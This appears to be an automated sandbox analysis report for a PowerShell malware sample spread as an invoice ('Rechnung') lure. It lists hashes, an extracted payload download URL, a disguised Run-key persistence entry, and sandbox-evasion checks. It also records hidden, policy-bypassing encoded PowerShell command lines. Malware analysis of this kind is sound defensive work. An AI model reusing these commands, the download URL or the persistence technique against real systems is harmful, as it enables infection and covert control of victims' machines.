Analysis

max time kernel: 300s
max time network: 210s
platform: windows10-2004_x64
resource: win10v2004-20230220-de
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-de, locale:de-de, os:windows10-2004-x64, system, windows
submitted: 14-04-2023 11:38

Static task: static1

Behavioral task: behavioral1
  Sample: Rechnung tfdp.bat
  Resource: win10v2004-20230221-de

Behavioral task: behavioral2
  Sample: Rechnungs/SM.ps1
  Resource: win10v2004-20230220-de
General

Target: Rechnungs/SM.ps1
Size: 1KB
MD5: 28ac93cb29f22234f09d8dd8ae2ba8d9
SHA1: eb6eb0a906652ca447d5db48a1158c0dab36b488
SHA256: 445da7c0f861bca8d8432bf693748870d4bcba3c2d1dcaebecb833fb7b435840
SHA512: 092a31e212dc9be38a63ea8970db8cca0a0df58f4f097e9e1cea7b6b6dd6e411a4e262ef0cd48328069af25c82d8b632f9c7eaa34a9c3acce0929964505d0be0
Malware Config

Extracted URL: https://this-is-vip.site/trs.zip
Signatures

Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate\\client32.exe" | powershell.exe

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | taskmgr.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | taskmgr.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process | entries
  1576 | powershell.exe | 2
  3196 | powershell.exe | 2
  4160 | taskmgr.exe | 60

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | Process
  4160 | taskmgr.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1576 | powershell.exe
  Token: SeDebugPrivilege | 3196 | powershell.exe
  Token: SeDebugPrivilege | 4160 | taskmgr.exe
  Token: SeSystemProfilePrivilege | 4160 | taskmgr.exe
  Token: SeCreateGlobalPrivilege | 4160 | taskmgr.exe

Suspicious use of FindShellTrayWindow (64 IoCs)
  pid | Process | entries
  4160 | taskmgr.exe | 64

Suspicious use of SendNotifyMessage (64 IoCs)
  pid | Process | entries
  4160 | taskmgr.exe | 64

Suspicious use of WriteProcessMemory (2 IoCs)
  description | pid | Process | procid_target
  PID 1576 wrote to memory of 3196 | 1576 | powershell.exe | 81
  PID 1576 wrote to memory of 3196 | 1576 | powershell.exe | 81
Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1576)
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Rechnungs\SM.ps1
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3196, child of PID 1576)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc 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
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\taskmgr.exe (PID 4160)
  Command line: "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 3KB
MD5: 7f3eefe85bfa5a7893d2fd007bfc8695
SHA1: 06be01e43200fe7ed58abd49a0477a52aece68ab
SHA256: 63389a084cd07bfae485891e3639843c77c6e870124a84f41568c824522751c7
SHA512: 43fd1dc2ab3cd21865e6d03b8e0494d6924fdd4056ea6b60c41638dd57dd246168a4e1652eaa005c3f95cb95a8d07bfcbf41c9df81f568278939a100dda006a0

Filesize: 64B
MD5: feadc4e1a70c13480ef147aca0c47bc0
SHA1: d7a5084c93842a290b24dacec0cd3904c2266819
SHA256: 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512: c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82